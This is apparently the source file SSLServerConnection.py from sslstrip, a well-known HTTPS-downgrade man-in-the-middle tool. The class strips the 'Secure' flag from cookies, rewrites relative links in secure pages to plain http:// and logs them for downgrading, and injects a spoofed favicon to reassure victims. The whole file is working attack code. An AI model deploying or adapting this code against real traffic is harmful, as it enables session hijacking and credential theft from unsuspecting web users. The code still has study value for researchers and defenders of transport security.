Path: blob/master/sslstrip-work-2019/sslstrip/SSLServerConnection.py
1306 views
# Copyright (c) 2004-2009 Moxie Marlinspike1#2# This program is free software; you can redistribute it and/or3# modify it under the terms of the GNU General Public License as4# published by the Free Software Foundation; either version 3 of the5# License, or (at your option) any later version.6#7# This program is distributed in the hope that it will be useful, but8# WITHOUT ANY WARRANTY; without even the implied warranty of9# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU10# General Public License for more details.11#12# You should have received a copy of the GNU General Public License13# along with this program; if not, write to the Free Software14# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-130715# USA16#1718import logging, re, string1920from ServerConnection import ServerConnection2122class SSLServerConnection(ServerConnection):2324'''25For SSL connections to a server, we need to do some additional stripping. First we need26to make note of any relative links, as the server will be expecting those to be requested27via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.28'''2930cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)31cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)32iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)33linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)34headExpression = re.compile(r"<head>", re.IGNORECASE)3536def __init__(self, command, uri, postData, headers, client):37ServerConnection.__init__(self, command, uri, postData, headers, client)3839def getLogLevel(self):40return logging.INFO4142def getPostPrefix(self):43return "SECURE POST"4445def handleHeader(self, key, value):46if (key.lower() == 'set-cookie'):47value = SSLServerConnection.cookieExpression.sub("\g<1>", value)4849ServerConnection.handleHeader(self, key, value)5051def stripFileFromPath(self, path):52(strippedPath, lastSlash, file) = path.rpartition('/')53return strippedPath5455def buildAbsoluteLink(self, link):56absoluteLink = ""5758if ((not link.startswith('http')) and (not link.startswith('/'))):59absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link6061logging.debug("Found path-relative link in secure transmission: " + link)62logging.debug("New Absolute path-relative link: " + absoluteLink)63elif not link.startswith('http'):64absoluteLink = "http://"+self.headers['host']+link6566logging.debug("Found relative link in secure transmission: " + link)67logging.debug("New Absolute link: " + absoluteLink)6869if not absoluteLink == "":70absoluteLink = absoluteLink.replace('&', '&')71self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);7273def replaceCssLinks(self, data):74iterator = re.finditer(SSLServerConnection.cssExpression, data)7576for match in iterator:77self.buildAbsoluteLink(match.group(1))7879return data8081def replaceFavicon(self, data):82match = re.search(SSLServerConnection.iconExpression, data)8384if (match != None):85data = re.sub(SSLServerConnection.iconExpression,86"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)87else:88data = re.sub(SSLServerConnection.headExpression,89"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)9091return data9293def replaceSecureLinks(self, data):94data = ServerConnection.replaceSecureLinks(self, data)95data = self.replaceCssLinks(data)9697if (self.urlMonitor.isFaviconSpoofing()):98data = self.replaceFavicon(data)99100iterator = re.finditer(SSLServerConnection.linkExpression, data)101102for match in iterator:103self.buildAbsoluteLink(match.group(10))104105return data106107108